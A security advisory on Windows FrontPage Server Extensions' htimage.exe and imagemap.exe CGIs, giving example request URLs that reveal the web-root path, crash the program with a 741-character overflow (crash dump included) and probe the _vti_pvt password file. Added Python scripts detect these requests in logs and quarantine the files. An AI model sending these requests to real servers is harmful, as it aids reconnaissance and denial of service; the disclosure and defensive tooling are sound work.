COMMAND
htimage.exe & imagemap.exe
SYSTEMS AFFECTED
FrontPage Server Extensions
PROBLEM
The following is based on a Legion2000 (Russian Security Team) advisory;
the bugs were discovered by Narrow. CERN Image Map Dispatcher
(/cgi-bin/htimage.exe) comes by default with FrontPage. Narrow
found three bugs in "htimage.exe":
1) Gives us the full path to the root directory
2) Simple buffer overflow
3) Allow us to access files.
1) Gives us the full path to the root directory
===============================================
As said before, the first bug gives us the full path to the root
directory. It was tested against some servers, and all were
vulnerable! Tested/Vulnerable FP Servers: 3.0.2.926
(FrontPage'98), 3.0.2.1706, 4.0.2.2717, 2.0.1.927, 3.0.2.926,
3.0.2.1105, 3.0.2.1330, 3.0.2.1117 (all Windows based web servers
are vulnerable if we have permission to execute "htimage.exe" and
"htimage.exe" exists).
To test this vulnerability we need "htimage.exe" in our "cgi-bin"
directory (it's installed by default) and permission to execute
it. That's why only Windows is vulnerable: Unix based systems
can't execute "*.exe" files. If we access "htimage.exe" using
our favorite web browser like:
http://server/cgi-bin/htimage.exe/linux?0,0
we get this error:
Error
Error calling HTImage:
Picture config file not found, tried the following:
q:/hidden_directory_because_of_the_script_kiddies/webroot/linux
/linux
Now we know that the path to the root directory is
"q:/hidden_directory_because_of_the_script_kiddies/webroot/".
2) Simple buffer overflow
=========================
As said before, this is a simple buffer overflow. Tested against
"Microsoft-PWS-95/2.0" and "FrontPage-PWS32". Tested / Vulnerable
OS: Windows'95/98. "htimage.exe" overflows if we access it
like: http://server/cgi-bin/htimage.exe/<741 A's>?0,0
HTIMAGE caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
ECX=0054015c DS=013f ESI=005401a0 FS=3467
EDX=bff76648 ES=013f EDI=00540184 GS=0000
Bytes at CS:EIP:
Stack dump:
bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28
0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c
<Server still running> + <500 Server Error> First remote
FrontPage exploit?
3) Allow us to access files
===========================
It's not a serious bug. Using "htimage.exe" we can access files
on the server (it opens and parses them as image map
configuration), but we can't read them. Accessing "htimage.exe" like:
http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
outputs:
Error
Error calling HTImage:
HTImage.c: Syntax error at line 1 Bad field name, expecting 'default', 'rectangle', 'circle' or
'polygon' (got an alphanumeric string)
Accessing "/_vti_pvt/service.pwd" directly outputs: 403 Forbidden
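As an added example (not part of the advisory), the following Python script scans web server access logs in NCSA Common Log Format for requests to the two image map CGIs and labels each hit according to the three behaviours described above: any request to the CGI (its error output reveals the web root path), a path-info segment long enough to match the crash case, and a path-info pointing into a FrontPage _vti_ private directory. The sample log lines, the client addresses and the 256-byte length cut-off are constructed assumptions, not values from the advisory.

```python
import re
from urllib.parse import unquote

# The two server-side image map CGIs named in the advisory.
IMAGEMAP_CGIS = ("htimage.exe", "imagemap.exe")

# Path-info length at or above which a request is flagged as a possible
# overflow attempt. The advisory's crash uses 741 bytes; real map file
# names are far shorter, so a lower cut-off catches padded requests with
# margin. Assumed value, not taken from the advisory.
OVERSIZED_PATH_INFO = 256

# NCSA Common Log Format: client ident user [time] "method target proto" status size
CLF_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>\S+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log, not from the advisory. The third request carries
# the 741-byte path info that the advisory reports crashing htimage.exe.
LONG_PATH_INFO = "A" * 741
SAMPLE_LOG = (
    '10.0.0.5 - - [01/Jan/2000:10:00:01 +0000] "GET /index.htm HTTP/1.0" 200 1234\n'
    '10.0.0.5 - - [01/Jan/2000:10:00:02 +0000] "GET /cgi-bin/htimage.exe/linux?0,0 HTTP/1.0" 500 301\n'
    f'10.0.0.5 - - [01/Jan/2000:10:00:03 +0000] "GET /cgi-bin/htimage.exe/{LONG_PATH_INFO}?0,0 HTTP/1.0" 500 0\n'
    '10.0.0.5 - - [01/Jan/2000:10:00:04 +0000] "GET /cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0 HTTP/1.0" 500 200\n'
    '10.0.0.6 - - [01/Jan/2000:10:00:05 +0000] "GET /cgi-bin/imagemap.exe/maps/site.map?12,34 HTTP/1.0" 302 0\n'
    'this line is deliberately malformed and must be skipped\n'
)


def parse_clf(line):
    """Parse one CLF line into a dict of fields, or return None if malformed."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def classify_target(target):
    """Label a request target that touches one of the image map CGIs.

    Returns None when neither CGI name appears in the path. Otherwise the
    text after the CGI name (the PATH_INFO the CGI treats as a map file
    name) decides the label.
    """
    path = unquote(target.split("?", 1)[0]).lower()
    for cgi in IMAGEMAP_CGIS:
        idx = path.find("/" + cgi)
        if idx == -1:
            continue
        path_info = path[idx + 1 + len(cgi):]
        if len(path_info) >= OVERSIZED_PATH_INFO:
            return "oversized path info (possible overflow attempt)"
        if "/_vti_" in path_info:
            return "probe of FrontPage _vti_ directory through the CGI"
        return "request to image map CGI (error output reveals web root path)"
    return None


def scan_log(text):
    """Return (client, status, target, label) for every flagged request."""
    findings = []
    for line in text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        label = classify_target(rec["target"])
        if label is not None:
            findings.append((rec["client"], rec["status"], rec["target"], label))
    return findings


if __name__ == "__main__":
    for client, status, target, label in scan_log(SAMPLE_LOG):
        print(f"{client} {status} {target[:50]:<50} {label}")
```

Matching on the CGI name anywhere in the decoded path rather than on a fixed "/cgi-bin/" prefix is deliberate: the advisory's fix is to remove the files from every location, so a copy left in another executable folder should still be spotted in the logs.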
SOLUTION
FrontPage Server Extensions versions prior to FrontPage 2000 ship
with files called imagemap.exe and htimage.exe, which are
server-side NCSA and CERN compliant components that support
server-side image maps. If attacked, these files are vulnerable
to buffer overruns, exploits of cross site scripting, and access
to drive path and file information. ALL WEB PRESENCE PROVIDERS
ON BOTH THE UNIX AND WINDOWS PLATFORMS SHOULD DELETE ALL
OCCURRENCES OF THESE FILES (imagemap.exe and htimage.exe) ON ALL
WEB SERVERS. FrontPage defaults to using client side image maps.
Removing the files will have minimal or no impact on end user
functionality.
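To support the deletion step above, here is an added Python audit script (not from Microsoft or the advisory) that walks one or more web roots, lists every htimage.exe and imagemap.exe found regardless of file name case, and moves them into a quarantine directory rather than deleting outright so they can be restored if something turns out to depend on them. The directory layout built in demo() is constructed for illustration; the file names are the two from the advisory.

```python
import os
import shutil
import tempfile

# File names to remove, compared case-insensitively (Windows file systems
# ignore case, so HTIMAGE.EXE is the same file as htimage.exe).
TARGET_NAMES = {"htimage.exe", "imagemap.exe"}


def find_imagemap_cgis(roots):
    """Walk each web root and return the sorted full paths of every
    htimage.exe / imagemap.exe found beneath it."""
    hits = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                if name.lower() in TARGET_NAMES:
                    hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def quarantine(paths, quarantine_dir, dry_run=True):
    """Move the listed files into quarantine_dir.

    The destination name encodes the original path (separators replaced)
    so the file can be put back by hand if needed. With dry_run=True
    nothing is moved; the planned (source, destination) pairs are
    returned either way so the plan can be reviewed first.
    """
    os.makedirs(quarantine_dir, exist_ok=True)
    plan = []
    for src in paths:
        flattened = src.replace(os.sep, "_").replace(":", "")
        dest = os.path.join(quarantine_dir, flattened)
        plan.append((src, dest))
        if not dry_run:
            shutil.move(src, dest)
    return plan


def demo():
    """Build a constructed web-root layout in a temp dir, audit it,
    quarantine the hits and return (basenames found, paths left over)."""
    base = tempfile.mkdtemp(prefix="fpse-audit-")
    layout = [
        "webroot/cgi-bin/htimage.exe",
        "webroot/cgi-bin/imagemap.exe",
        "webroot/cgi-bin/search.exe",        # unrelated CGI, must be left alone
        "webroot/_vti_bin/shtml.exe",        # FrontPage component, not a target
        "sites/customer1/cgi-bin/HTIMAGE.EXE",  # upper-case copy in a second root
    ]
    for rel in layout:
        full = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(b"MZ placeholder")      # constructed stand-in for a binary
    roots = [os.path.join(base, "webroot"), os.path.join(base, "sites")]
    before = find_imagemap_cgis(roots)
    quarantine(before, os.path.join(base, "quarantine"), dry_run=False)
    after = find_imagemap_cgis(roots)
    result = ([os.path.basename(p) for p in before], after)
    shutil.rmtree(base, ignore_errors=True)
    return result


if __name__ == "__main__":
    found, remaining = demo()
    print("quarantined:", found)
    print("remaining:", remaining)
```

Run the audit with dry_run=True first against the real web roots and check the returned plan; the quarantine directory should itself sit outside every executable folder, otherwise the moved files stay reachable through the web server.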
FrontPage 2000 defaults to restricting uploads of files to
executable folders. The server side setting is
NoExecutableCgiUpload:1. In order to control future uploads of
the image map files or any other files to executable folders on
the server, configure the NoExecutableCgiUpload setting. This
server side setting is described further in the FrontPage 2000
Server Extensions resource kit at:
http://officeupdate.microsoft.com/frontpage/wpp/serk/apndx03.htm#apndx03.doc-1079